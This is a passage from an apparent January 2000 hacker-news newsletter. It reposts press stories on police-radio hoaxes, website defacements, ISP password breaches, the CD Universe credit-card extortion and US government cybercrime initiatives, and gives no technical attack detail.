Another man was arrested in the Los Angeles area last week for a similar offense. Spokesman Tony Parrino said the California Highway Patrol's communications center in Vallejo received eight to 10 transmissions in December on its frequencies from a man posing as a police officer and claiming there was a shooting in progress or a shot officer. "He's quite disruptive, and he has caused our officers and other agency officers to roll Code 3 with red lights and sirens to different locations -- which have turned out not to be true -- at great risk to the public and to our officers and all public-safety officers en route to that location," Parrino said. "He's quite a problem right now." Police departments alerted Police in San Francisco, Berkeley, Richmond, and Albany have reported similar incidents, and all their officers have been alerted about the prankster. The Federal Communications Commission (FCC), which regulates the nation's radio airwaves, said it is investigating but refused to state the status of its probe. In an apparent coincidence, the California Highway Patrol (CHP) in the Los Angeles area said its investigators arrested Jack Gerritsen, 63, of Bell last week for broadcasting recorded profane comments on frequencies used by the CHP and other police agencies in the Los Angeles area as well as a TV station's news unit. The CHP said it knows of no link between the two cases. They have not yet found the man in the Bay area. He appears to be equipped with a programmable radio transceiver and is well-versed in police radio codes. May be disgruntled ex-employee Parrino said the man apparently monitors police transmissions and may be a former government employee. He said CHP dispatchers have often warned him over the air to stop his activities. "This usually sets him off where he starts a list of profanities and starts yelling over the radio," Parrino said. "He starts saying, 'How much time am I going to get in jail? 
What are they going to do to me?'" The CHP said it is no longer dispatching units in response to the man's calls. Berkeley police said they have had six to eight on-air encounters with the man since early December. Obscenities aimed at dispatchers Berkeley police Lt. Russell Lopes said that on Dec. 28 the radio pirate reported a shooting at a street intersection that does not exist. The dispatcher, realizing it was a hoax, read a lengthy FCC warning telling him to desist. The man replied by yelling over the dispatcher's voice, Lopes said, swearing at the dispatcher and launching into an expletive-filled tirade. The dispatcher then switched police radio traffic to another channel, and the man disappeared. Lopes said they now recognize his voice and no longer send units to respond to his calls. Goes away if ignored "It seems like if he gets on the radio and makes a call and we just ignore him, he kind of goes away," said Lopes, who is not committing much manpower to investigating the case. "We're really not too concerned about it. We're trying to figure out who it is, but it's not a major deal. ... [If] he gets on the radio and he stays on the radio for any length of time, we can go to another channel which he cannot get onto. It's [only] an inconvenience." Lopes said they last heard from the man Sunday night, but he did not have details. The San Francisco police reported that on Thursday, a person transmitted twice within 15 minutes on one of their police frequencies that an officer was in trouble. The dispatch center promptly performed a roll-call check of all officers on duty and found that the call was false, said Rex Martin, the department's director of 911 communications. Martin said the department is not investigating because it was an isolated incident. A threat to public safety In Albany, the police force said the mysterious prankster has aired two bogus incidents on its frequency. 
Because the dispatcher knows the voices of all 30 officers in the department, the fake calls were recognized immediately, but officers dispatched just in case. Detective James Horn said the man's actions could threaten public safety by interfering with the transmissions of emergency personnel. "If there was an ongoing emergency, he could severely hamper rescue efforts," Horn said. "I hope he's caught. Again, getting on law enforcement channels is dangerous." Police say they have no clue as to the man's motive. 'We should stop this guy' "Maybe he's got something against law enforcement. Maybe he just gets his jollies off doing it," said Horn. Parrino said, "This is wrong, and we should stop this guy, but there's not much that we can do. ... [The] investigators, they have a terrible job trying to find where this guy is." Lopes said he would be difficult to catch. "He could be anywhere in the Bay area," he said. "He could be stationary inside a home. He could be in a car. There's just no way of telling." FCC lends a hand In Southern California, Gerritsen was arrested after the highway patrol enlisted the FCC's help. CHP Sgt. Jeffrey D. Goodwin said Gerritsen recorded obscene comments with a digital recorder that distorted his voice and used a hand-held programmable radio to transmit them over 100 times in a period of three months. Goodwin said CHP investigators during surveillance operations would hear comments like "The CHP are a bunch of [expletive]" on their radios several times during a particular day. "It's annoying. Secondly, it interferes with our operations, and that also bothered me, so that's why our unit investigated this," Goodwin said. Faces only misdemeanor charges Because the transmissions could interfere with a radio distress call by a CHP officer, the agency arranged for the FCC to track the signals with sophisticated equipment and triangulation. 
Once the FCC pinpointed his location, CHP said its investigators caught Gerritsen in the act of transmitting outside of his coin exchange store in Bell. Because the alleged violations were only misdemeanors, Gerritsen was immediately released and given an order to appear in court this month. He faces a year in jail for each offense. Goodwin said the transmissions have stopped. Gerritsen could not be reached for comment. "Somebody like this should be arrested and put in jail because it affects or could possibly affect the safety of the officers," said Goodwin. "The potential for something serious happening has been averted by his arrest."

Robert Wang is an APBnews.com staff writer (robert.wang@apbnews.com).

@HWA

70.0 ParseTV has Abruptly Canceled 01/07/00
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by ewidgb

The online television network Pseudo has cancelled its Hack/Phreak streaming TV channel. ParseTV has been closed, effective immediately. We have not received an official reason for the abrupt cancellation. ParseTV made headlines last year when the show's host attempted to perform a hoax on the MTV documentary 'Real Life'. Shamrock, the show's host, was replaced shortly thereafter for unrelated reasons. Reruns will still be available on the site until further notice.

ParseTV
http://www.parsetv.com

Letters from HNN Viewers Regarding the MTV special
http://www.hackernews.com/special/1999/mtv/mtv.html

Letter from Emmanuel Goldstein regarding the MTV special
http://www.hackernews.com/special/1999/mtv/emmanuel.html

Letter from Shamrock regarding the MTV special
http://www.hackernews.com/special/1999/mtv/shamrock.html

@HWA

71.0 Finland Authorities Solve Massive Computer Crime Case 01/07/00
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by avarr

The Finnish police have solved what is thought to be Finland's largest electronic intrusion ever.
A young man with the alias TCB had electronically broken into over a hundred computer systems owned by the state, businesses, high schools and others in Finland and abroad during 1997 and 1998. It appears that no damage was caused but the attacker did collect users' log-ins, passwords and emails. The intruder was able to achieve root access in 60% of the systems he broke into. The Finnish Central Criminal Police (KRP) calls this a good lesson in computer security for businesses and communities.

Kotimaa - in Finnish only
http://ww2.yle.fi/show/YleEsitData?sivu_id=53973&usr_id=0
(Anyone want to translate this?? - Ed)

@HWA

72.0 The EPA Cracks Down On Security 01/07/00
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Diane

After an audit last month by the General Accounting Office the Environmental Protection Agency has taken several steps to beef up the security of its systems. The EPA has taken such steps as early termination of remote access, installing the latest patches, and reconfiguring the server to help shore up its systems.

Federal Computer Week
http://www.fcw.com/pubs/fcw/2000/0103/web-epa-01-06-00.html
(Sorry, page requested returned a 404 - Ed)

@HWA

73.0 FBI Still Investigating Y2K Cyber Threats 01/07/00
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

The deputy assistant director of the FBI, Michael Vatis, told reporters that the agency has thwarted up to six Y2K related cyber intrusions and detected sophisticated automated tools aimed at knocking out computer networks.

Reuters - via ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2418190,00.html?chkpt=zdnntop

FBI investigating 20 Y2K threats

Several incidents involved threats to blow up equipment such as power plants, while others involved cyber intrusions or detection of sophisticated hacker tools.
By Reuters
January 6, 2000 2:14 PM PT

The FBI said Thursday it had moved to thwart up to 20 or so possible threats against targets such as power plants and computer networks during a heightened security watch that started before 2000 dawned. About a dozen "physical incidents" involved threats to blow up equipment such as electrical power plants, while another six or so involved cyber intrusions or detection of sophisticated ''hacker'' tools aimed at knocking out computer networks, deputy assistant director Michael Vatis told reporters. "On neither side did we think that this level of activity was particularly unusual," added Vatis, who oversaw a 24-hour headquarters command post tied to special year-end watches at all 56 FBI field offices. Asked to explain what he meant by the type of "physical" violence in question, Vatis said: "threats involving explosives or physical destruction of equipment or a plant of electrical power or something like that." Cases still under investigation All of the cases opened during the special year 2000 watch were still being investigated, an FBI spokeswoman, Debbie Wireman, said. The FBI published on Nov. 2 a study called Project Megiddo, which warned of possible year 2000-related violence by cults seeking to spark a biblical day of reckoning or by other domestic fringe groups. The study had warned that any power outages or breakdowns sparked by the so-called Y2K computer quirk could play into conspiracists' fears of a plot to create a "one-world government." The project was dubbed Megiddo after a hill in northern Israel linked to Armageddon, the prophesied final battle between forces of good and evil. Attorney General Janet Reno did not answer directly when asked why she thought the fears reflected in the Megiddo report had not yet led to any big trouble. "The nice answer would be that there was no threat," she told her weekly press conference. "What we must all do, I think, is ...
take reasonable precautions ... when we have specific information that can inform the American people, that we advise them." The FBI Y2K command post operated from Dec. 29 to Jan. 5. Vatis declined to comment on whether any suspected plots to strike New Year's Eve celebrated had been foiled or whether any originated abroad. He declined to discuss specifics of the physical threats under investigation or link any of them to any year 2000 issues. Bomb-making threat discussed He also declined to address the case of an alleged plot to smuggle bomb-making material into the United States from Canada. One Algerian man, Ahmed Ressam, has been charged while the authorities are investigating a suspected associate, Abdel Hakim Tizegha, held in Seattle on immigration charges. Vatis is director of the National Infrastructure Protection Center, or NIPC, an interagency group designed to detect and deter both cyber intrusions and physical attacks on infrastructure such as power grids, pipelines and water systems. On the computer security side, Vatis urged system administrators to download a new NIPC tool to scan for a hacker tool designed to cripple networks. The download was made available on the NIPC Web page on Dec. 30, after discovery of new so-called "distributed denial of service" tools aimed at systems using the Sun Solaris operating system. Vatis said three of the half dozen or so new FBI investigations were triggered in recent days when private companies, using the NIPC detection software, found signs their networks had been penetrated. The hacker devices -- such as one dubbed "trin00" and another called "Tribe Flood Network" or "tfn" -- are capable of enlisting multiple systems to amplify an attack on the ultimate target, Vatis said. 
@HWA

74.0 Clinton Wants Increased Computer Security 01/07/00
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by mortel

President Clinton plans to announce a new initiative Friday to protect federal computers from infiltrators. Administration officials speaking on the condition of anonymity said Clinton's budget request for 2001 would seek additional funds for monitoring and protecting government computer systems.

Associated Press - via Yahoo
http://dailynews.yahoo.com/h/ap/20000107/pl/clinton_cyber_terrorism_2.html

Friday January 7 12:03 AM ET

Clinton Aims To Combat Hackers

WASHINGTON (AP) - Stepping up vigilance against cyber-terrorism, President Clinton plans to announce a new initiative Friday to protect federal computers from infiltrators. Clinton has frequently expressed concern about the emerging threat that hackers, thieves and other governments pose to the nation's high-tech infrastructure. A top adviser Thursday included cyber-terrorism near the top of a list of threats facing America in the next century. ``I think there's a whole new realm of threat we're going to be dealing with,'' National Security Adviser Sandy Berger said in response to a question after a National Press Club speech. ``The ability to take weapons of mass destruction across national borders with relative ease; the ability to attack our computers that run our infrastructure through cyber-terrorism.'' Administration officials speaking on condition of anonymity said Clinton's budget request for 2001 would seek additional funds for monitoring and protecting government computer systems. ``Now that we're past Y2K, we need to continue to insulate and secure our nation's computers,'' one official said. The official did not have any specific dollar figures, but USA Today reported in Friday's issue that the plan includes $2 billion to make the government's computer systems less vulnerable to attack.
The new initiative builds on steps the administration announced last year. It would seek to develop new technologies, increase public and private cooperation against computer sabotage, improve training for government agents and boost protection of computer systems. ``It's creating a number of programs to train, detect and strengthen our ability to deal with cyber-terrorists,'' the official said. Last July, the administration announced that it was creating a government-wide security network to protect against hackers. The plan included an elaborate network of electronic obstacles, monitors and analyzers to watch for suspicious activity. The first 500 intrusion monitors were to be installed on non-military government computers early this year, and the full system was to be completed by May 2003.

@HWA

75.0 Interview with Lloyd's of London and RailTrack Defacer 01/07/00
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by evilwench

Over the New Year, Lloyd's of London and a number of other sites including Railtrack UK, Eidos, and the Electronic Frontier Foundation (EFF) had their web pages defaced. MisterX who has claimed responsibility for these actions has given an interview with the UK Register.

The UK Register
http://www.theregister.co.uk/000106-000001.html

Posted 06/01/2000 2:03pm by Mike Magee

Railtrack, Lloyds of London Web hacker explains motives

A member of a group which hacked into the Lloyds of London web site twice in one day has explained his intent in an exclusive interview with The Register. Over the New Year, Lloyds and a number of other sites including Railtrack UK, Eidos, and the Electronic Frontier Foundation (EFF) suffered attacks to their sites from groups appearing to act in concert.
The hacker, who calls himself MisterX, also claims, in the interview below, that credit card transactions across the Internet are unsafe, and that he and his group have methods for hoovering up confidential data from Web sites.

Q Hackers are generally described in the press as malicious or mischievous. Is there any serious intent to this activity, is it an intellectual exercise or is it just done for "fun" or to see if it can be done?

A Some people do it for intellectual challenge, others do it with malicious intent. Some do it for fame amongst the hacker community, but all they get is disrespect. My hacks were to prove a point, which I think they have done. Many large UK organisations need to revise their security strategies, or lack of them. I defaced web sites to prove this point, but I could have easily got access to other systems and caused a lot of damage. I am trying to make the community, in general, aware of the threats of cyber terrorism, and how real they are.

Q What are the lessons large businesses should learn from their apparent inability to protect themselves against hacking?

A They could have protected themselves from the attacks I used on them if only they had kept up to date on the latest computer security developments.

Q Is there a worldwide network of people who share ideas and collectively hack sites, or is it more like small groups who have little contact with each other?

A There is an underground scene, which shares files unreleased to the public. [These are] files on the latest security developments hot off the press, way before the public even knows these holes exist. But good morals normally lead them into the open. As for web site defacement it is generally small groups that do this, trying to compete against each other, and these groups are not very well respected within the mainstream community.

Q Are the legal penalties against hacking that many governments have instituted any deterrent at all? Are the legal penalties too heavy handed?
A Some governments have ridiculous penalties, as in the case of two Chinese hackers who stole a measly amount from a bank and were sentenced to death. The UK is more lax on the law in this respect :) I would just like to delve slightly into e-commerce. I warn the public about the drastic dangers of shopping online. I, personally, could break into a number of highly used e-commerce sites and steal the credit card numbers of every customer that ever shopped there. The head of Novell that shopped online and had his credit card number snarfed, said it was due to cookies. Well, the truth is someone most probably broke into one of the sites he used it on and his wasn't the only card abused, yet the site probably would not have even known the attack had taken place, and could still be taking place. Shopping online is not safe at the moment, despite what the big companies say, and which are just trying endlessly to grab your money, and see the Internet as just another means of doing so. They tell you that they care about your security, OK, I grant them that, maybe they do. It is not in their hands though. As I mentioned earlier, hackers have resources unavailable to the general public, meaning a system administrator may think his site is secure, but, some one some where has a method of breaking in. ®

Lloyds of London, Met Office follow Railtrack UK in hack attack

@HWA

76.0 Pac Bell Hit by Possible Cyber Intruder 01/10/00
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by The_Question

Law enforcement officials recently notified PacBell that persons currently in custody had gained access to the passwords of some of the ISP's California users. PacBell has gone so far as to force users to change their passwords. PacBell has said that users who do not change passwords by January 14 will be locked out of their account. It is unknown how many accounts are actually affected or who the persons in custody are.
Pacbell did say that no unusual account activity has been noticed. (It is a little late to change passwords now, especially if you have no idea how the list was compromised in the first place.)

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2419466,00.html?chkpt=zdnntop

Teen hacks 27 ISPs, gains root access

Pacific Bell Internet Services not the only ISP to have its network compromised by a teen hacking ring.

By Robert Lemos and Sean Silverthorne, ZDNet News
UPDATED January 10, 2000 6:13 PM PT

A 16-year-old hacker affiliated with the cybergang known as Global Hell compromised at least 27 Internet service providers late last year, stealing passwords and, in some cases, destroying data, according to details of a police investigation released Monday. The organizations that were compromised were "mainly in the U.S.," said Damian Frisby, a detective with the Sacramento Valley Hi-Tech Crime Task Force. "A lot of them were private Internet companies, law schools and colleges, and a couple were backbone Internet providers. The hackers were able to gain root access." The facts in the case came three days after Pacific Bell Internet Services notified an unknown number of customers that their passwords had been compromised and that they have until Jan. 14 to change them. In an e-mail message sent Friday to customers, Valeri Marks, president and CEO of Pacific Bell Internet Services, said that a band of hackers targeted a number of its California customers. "We were recently notified by law enforcement officials that a ring of hackers, currently in police custody, had gained access to the password information of some California ISP users. Although there has been no indication of any account abuse, you should change your password immediately," the notice read. One teen charged In fact, the police have charged just one person, a 16-year-old West Hills, Calif., resident, with several felonies including unlawful access and grand theft.
According to Frisby, the cyberthief had connections with a notorious online group known as Global Hell, several members of which were arrested last fall by federal law enforcement officials. The original investigation followed a Dec. 7, 1999, complaint by Innercite, an El Dorado County Internet service provider, which reported that its servers had been compromised and several files deleted. Innercite also reported that its service had been used to perform network scans of computers at Sandia and Oakridge National Laboratories. Pacific Bell went beyond issuing a simple warning, saying that subscribers would be required to change their passwords or face being shut out of their accounts. "For your protection, if you have not changed your password by January 14, 2000, Pacific Bell Internet will require that you call in to change it in order to access your account," the e-mail stated. For good reason: More than 200,000 passwords had been stolen from the California Internet service provider, though the police found that only 63,000 had been decrypted at the time of arrest, said Frisby. Pacific Bell provided a Web address where users could change their passwords. A Pacific Bell support technician confirmed the action Saturday but could not provide details. No other information has been made available on Pacific Bell's site. Although hack attacks on ISPs are not uncommon, it is more rare for a service provider to require customers to change their passwords. So far, none of the other providers has come forward with details about the problem.

@HWA

77.0 Virgin ISP Issues New Passwords 01/10/00
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by macwizard

After discovering someone attempting to break into the email system Virgin has forced 170,000 of its 800,000 users to change their passwords. Officials claim that no security breach happened but that someone has attempted to break in.
(If no one got in why bother to change the passwords? This makes no sense.) BBC http://news.bbc.co.uk/hi/english/sci/tech/newsid_597000/597229.stm Hacker scare hits Virgin Net Security "not breached", but passwords must be changed Thousands of Virgin e-mail users are being issued with new passwords after the company found a hacker had been attempting to tap into its mailing system. More than 170,000 of Virgin Net's 800,000 UK customers had their service temporarily withdrawn at the weekend. A notice was posted on Virgin's official website warning users of the potential breach, and giving step-by-step instructions as to how they could change their passwords. Individual letters were also being sent out to inform anybody who had not logged on since the problem was detected. A spokesman said on Monday: "No actual security breach has happened, but we discovered someone was attempting to hack in. "Because we were able to work out how they were trying to do this, we were able to isolate a maximum of 25% of our customers who might have potentially been affected. "Their e-mail facilities have been temporarily switched off and we are in the process of creating new passwords for them. "It is important to emphasise that, in the event, no-one's security has actually been breached." The spokesman added that all those concerned were a certain "type" of customer, but he declined to identify which one. Microsoft scare The Virgin security scare comes just four months after Microsoft was forced to temporarily shut down e-mail links for 40m customers worldwide, following a breach of the company's Hotmail security system. On that occasion, a group of seven programmers calling themselves Hackers Unite later e-mailed online news service Wired to claim responsibility for the breach, which they said was intended to demonstrate the inadequacy of Hotmail's defences. 
Virgin Net user John Holland learnt of the potential breach when he tried to retrieve his e-mail messages on Sunday, and found his password was being rejected. He said: "For me it wasn't such a big problem, but for some customers who are trying to run businesses using e-mail they could have missed out on dozens of messages by the time they receive their letter telling them about the situation. "A potential breach doesn't bother me particularly because I don't have that much confidential information coming over, but clearly the fact there has been a potential breach is a cause for concern to some people." @HWA 78.0 CD Universe Customer Info Compromised 01/10/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Brian and birgir A Russian cyber-intruder using the alias Maxim tried to blackmail the online vendor CD Universe in December by threatening to release credit card data he had stolen off the site. The extortionist said that he sent a fax to CD Universe early in December saying "Pay me $100,000 and I'll fix your bugs and forget about your SHOP FOREVER, or I'll sell your cards and tell about this in the news." When CD Universe did not respond to his threats he posted 25000 credit card details on a website and sold the rest through chat rooms on IRC and other underground venues. Internetnews.com http://www.internetnews.com/ec-news/article/0,1087,4_278091,00.html Failed Blackmail Attempt Leads to Credit Card Theft January 9, 2000 By Brian McWilliams InternetNews.com Correspondent E-Commerce News Archives In what may be the largest credit card heist on the Internet, an 18-year-old Russian cracker claims to have stolen thousands of credit card numbers from an online store and dispensed them to visitors of his Web site. Before it was taken offline early Sunday morning, the rogue site, a page of which has been captured here, had doled out more than 25,000 stolen card numbers. 
Also included with the numbers were expiration dates and cardholder names and addresses, according to a counter on the page.

With the click of a button, visitors could launch a script that purportedly obtained a valid credit card "directly from the biggest online shop database," according to a message at the site.

The cracker, who goes by the nickname Maxus, claimed in an e-mail to InternetNews.com to have breached the security of CDuniverse.com, an online music store operated by eUniverse, Inc. of Wallingford, Conn.

Maxus said he had defeated a popular credit card processing application called ICVerify, from CyberCash (CYCH) and obtained a database containing more than 300,000 customer records from CDuniverse.

As proof of his exploit, Maxus e-mailed a file to InternetNews containing dozens of user names and passwords for accessing customer order status information at CDuniverse.

One of the victims, Greg Wilson of Binghamton, N.Y., confirmed that he had shopped at the online music store over a year ago. According to Wilson, he was contacted by his credit card company's fraud division last week after someone had attempted to make an authorized charge to his card.

Another victim, Charles Vance of Marietta, Ga. said he had purchased CDs from the company in the past, but had recently cancelled the card on file for unrelated personal reasons.

Cybercash officials disputed the hacker's report, saying their IC Verify product was not at issue.

"CyberCash's ICVERIFY product is a pc-based payment system, not a Web-enabled product and is not being used by CD Universe on its Web site. Therefore, the credit card information cited in recent coverage could not have come from ICVERIFY.

"Since we're not involved in this, any other questions should be addressed to law enforcement officials or CD Universe, as it is not appropriate to comment further due to the legalities surrounding this issue."
Maxus said that he decided to set up the site, titled Maxus Credit Cards Datapipe, and to give away the stolen customer data after officials at CDuniverse failed to pay him $100,000 to keep quiet about the security hole. Maxus claims the company agreed to the payment last month, but subsequently balked at initiating a wire transfer to a secret bank account because it might be noticed by auditors. After a week passed with no further contact from the company, Maxus said he put up his site and announced its presence Dec. 25th on an Internet Relay Chat group devoted to stolen credit cards. Soon after launching his site, Maxus said it became so popular with credit card thieves that he had to implement a cap to limit visitors to one stolen card at a time. The Internet service provider which hosted the Maxus site, Lightrealm Inc., of Kirkland, Wa, took the Maxus site down sometime early Sunday morning. Lightrealm was acquired by Micron Electronics (MUEI) last October. According to Elias Levy, chief technology officer of Internet security information firm SecurityFocus.com, which first publicized the existence of the Maxus site, the incident "is very disturbing. It realizes the fears people have about online commerce." But Levy pointed out that because card holders are usually only responsible for first $50 in fraudulent charges, the real danger in Internet credit card fraud falls on online merchants and credit card companies. "The Internet is not more dangerous for consumers. It allows a criminal to break into a single site and obtain not one credit card, but possibly a database of all credit cards of that site's customers," Levy said. Apprehending Maxus will not be easy, said Richard M. Smith, an online security expert in Brookline, Mass., who helped federal agents track down the author of the Melissa virus, David L. Smith. 
Maxus appears to move about online using stolen accounts and relays his email through other sites to conceal the originating Internet protocol address, said Smith.

"It's possible he could have slipped up somewhere along the way, but I think he's pretty free and clear and it's near zero that they will catch him," Smith said.

A guest book at the Maxus site contained dozens of entries from visitors, many of them in Russian.

According to BizRate, a service which collects feedback from online shoppers, CD Universe rates highly overall with excellent customer satisfaction scores for nearly all dimensions of its service.

@HWA

79.0 Northwest Notifies Customers of Security Breach 01/10/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond

After routine maintenance on the NorthWest Airlines web site administrators forgot to turn the security systems back on. NorthWest has said that it does not know how long customer information was vulnerable or if personal information such as credit card numbers were compromised. The company said that it is taking the unprecedented step of notifying all affected customers anyway.

Associated Press - via Northern light
http://library.northernlight.com/ED20000107690000013.html?cb=0&dx=1006&sc=0#doc

Story Filed: Friday, January 07, 2000 8:23 PM EST

EAGAN, Minn. (AP) -- Northwest Airlines is alerting customers who recently made purchases on its Frequent Flier Web site that their credit card numbers and personal information were unprotected because of a programming glitch.

Northwest spokesman Jon Austin said the risk of hackers getting the information is small, but one the airline is taking seriously.

``We want to be able to take care of this ourselves because it is a problem we created and one we want to help resolve,'' he said.

The problem arose when a computer programmer doing maintenance on the site put the system back on line, but forgot to restore the security system.
When a customer didn't see a small ``lock'' icon as he placed his order in mid-December, he notified the carrier that the information was not secure.

Austin did not say exactly how long the site was unsecured or how many passengers were affected. Northwest is now notifying passengers who made purchases at the time about the security lapse.

Copyright © 2000 Associated Press Information Services, all rights reserved.

@HWA

80.0 Parse Issues Statement About Cancellation 01/10/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Elyn

The unexpected cancellation of ParseTV last week by online TV broadcaster Pseudo has left a lot of people wondering what the hell happened. Host of the show Elyn Wollensky has released a brief statement hopefully explaining the situation.

Statement from ParseTV Host
Parse Issues Statement About Cancellation
http://www.hackernews.com/press/parsetv.html

Date: 1/8/00 7:28 PM
Received: 1/8/00 8:07 PM
From: Ewidgb@xxxx.com
To: contact@hackernews.com

Dear HNN,

After several e-mails, phone calls, & comments at last night's 2600 meeting, I think I need to issue a brief statement regarding Parse and requesting that no one deface Pseudo or try to do anything to their archives. I waited for Pseudo to issue a statement, but I guess they haven't, so here it is:

The hosts of ParseTV are grateful for all the notes and calls regarding the show & concern for our future. While we have not been informed of the official reason for Pseudo's cancellation of the ParseTV channel, we are grateful to Pseudo for the opportunities that they offered us.

We are currently discussing potential opportunities with several other webcasters and cable networks, which would allow us to take the show to a new level both in quality and the content offered.

Because of these discussions, we request that no one act out in a rash way. Particularly by defacing the Pseudo site or by attempting to attack their archives or databases.
Any defacement, denial of service attack, or database tampering would only harm our chances of being acquired by a respected news or webcast service. And, while it is great to be able to come to the negotiation table with an existing loyal and supportive audience base, it is equally important that our audience be seen as reliable and trustworthy.

Have no fear that we are trying to make a move that will benefit the integrity of the show, and allow us to continue to grow the quality and content that we worked so hard to pull together.

Once again, we would like to thank everyone who has written and called for your continued support and encouragement. If you would like to reach us directly, you can contact Elyn at solaar@hushmail.com & Mike at editor@aviary-mag.com.

Elyn Wollensky & Mike Hudak

Thanks

@HWA

81.0 HACK.CO.ZA DoS attack causes ISP to remove site
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The well known hack.co.za website has been under attack for several days forcing the ISP to take down the site's connectivity. There is no word yet as to why the site remains down after the DoS attacks stopped or who was behind the attacks but gov-boi is now looking for a new provider to host the site. If you can offer hosting (free) for this premier security site, please contact us and we'll get you in contact with gov-boi. Hopefully things will work out and the site will be back online shortly. - Ed

@HWA

82.0 Comments on Linux Security 01/10/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by white vampire

Jon Lasser began the Bastille Linux Project in order to harden the security of Red Hat Linux, the distribution he uses at work. In the process, he began looking at the other distributions to see how they handle security updates, and he was not at all happy with what he found. In a Freshmeat editorial, he shares his concerns and explains why it matters to you even if you do all your security monitoring for yourself.
Freshmeat http://freshmeat.net/news/2000/01/08/947393940.html @HWA 83.0 PirateCity.com Wins Domain Battle with FortuneCity.com 01/10/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by The Overlord Free webspace provider Fortunecity.com has axed plans to take the Piratecity.com community to court for so called use of FortuneCity's Proprietary Interests. PirateCity is a free web host provider to the underground community. It is rumored that continuous attacks on their website by pro-PirateCity supporters was too much to make the action worthwhile. PirateCity thanks all those who supported their cause but say they never promoted malicious cyber activity as a means to get their message across. PirateCity http://www.piratecity.com/news.htm @HWA 84.0 Taiwan Claims 1000 Viruses In Arsenal 01/10/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench Taiwanese Defense Ministry official Lin Chin-ching has been quoted as saying that Taiwan has 1000 viruses in its arsenal in preparation for a cyber war with China. (While there is no evidence to prove or disprove this statement it sounds like propaganda to me.) Bloomberg http://quote.bloomberg.com/fgcgi.cgi?ptitle=U.S.%20Economy&s1=blk&tp=ad_topright_econ&T=markets_fgcgi_content99.ht&s2=blk&bt=blk&s=27ac19370aa3ca9a7103812a68e1d077 Economy and Politics Sat, 15 Jan 2000, 8:51am EST Taiwan Has 1,000 Computer Viruses to Fight Cyber War With China, AFP Says By Peter Harmsen Taipei, Jan. 9 (Bloomberg) -- Taiwan's military is preparing for cyber warfare with China and has developed about 1,000 computer viruses for that purpose, Agence France-Presse reported, quoting the Liberty Times. 
``Should the People's Liberation Army launch electronics warfare against Taiwan, the military, armed with about 1,000 computer viruses, would be able to fight back,'' the paper quoted Defense Ministry official Lin Chin-ching as saying, according to AFP. One of the scenarios considered by Taiwan's Defense Ministry is for China to invade Taiwan's computer systems and alter the outcome of the March presidential polls, AFP said. After tensions between Taiwan and China rose in the middle of last year, cyberspace was one of the main scenes of hostility, with Internet users trading insults and hackers intruding on government Web sites. (Agence France-Presse, 1/9) @HWA 85.0 Reno Announces LawNet 01/11/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench The US attorney general, Janet Reno, has proposed the creation of a national computer crime-fighting network dubbed LawNet. The network would consist of a new nationwide computer system for information sharing and the creation of new forensic computer labs around the country. The network would work with law enforcement agencies on the federal state and local level. LA Times http://www.latimes.com/business/cutting/20000110/t000002956.html Associated Press - via MSNBC http://www.msnbc.com/news/355783.asp Reno to Discuss Plan to Bolster Efforts Against Cyber-Crime Law: The attorney general is expected to outline a proposal that includes a nationwide network that would facilitate investigations. By GREG MILLER, Times Staff Writer U.S. Atty. Gen. Janet Reno is expected today to propose the creation of a national computer crime-fighting network designed to enable swift cooperation among law enforcement agencies on crimes that often cross multiple jurisdictions and unfold in a matter of minutes, according to officials familiar with a speech Reno is scheduled to make at a Palo Alto conference. 
The network is part of a series of initiatives Reno is expected to outline at a time when law enforcement agencies across the country are struggling to keep up with technology's expanding role as a tool of crime. The initiatives would overhaul the way law enforcement agencies at every level work together to investigate crimes involving computers. One federal official who spoke on condition of anonymity said that coordination among agencies these days is often hit and miss at best. Reno's proposals also will include the establishment of a new nationwide computer system for sharing investigative information and the creation of new forensic computer labs around the country that would combine personnel from federal, state and local law enforcement agencies. She is not expected to provide much information on how such measures might be financed when she unveils them in a keynote speech today before members of the National Assn. of Attorneys General. The group is convening in Silicon Valley to discuss the impact of the Internet and technology on law enforcement. Many details of Reno's proposals remain unclear, including specifically how the plans would be funded. But officials familiar with the plans say they are a high priority for the Justice Department and the Clinton administration. In fact, Reno's proposals come in the wake of a series of computer-related initiatives the White House has announced in recent months. Last week, for example, President Clinton proposed allocating $91 million to develop new programs to protect the nation's computer networks from intrusion by hackers. Part of that funding would go toward the creation of a Federal Cyber Service, analogous to the 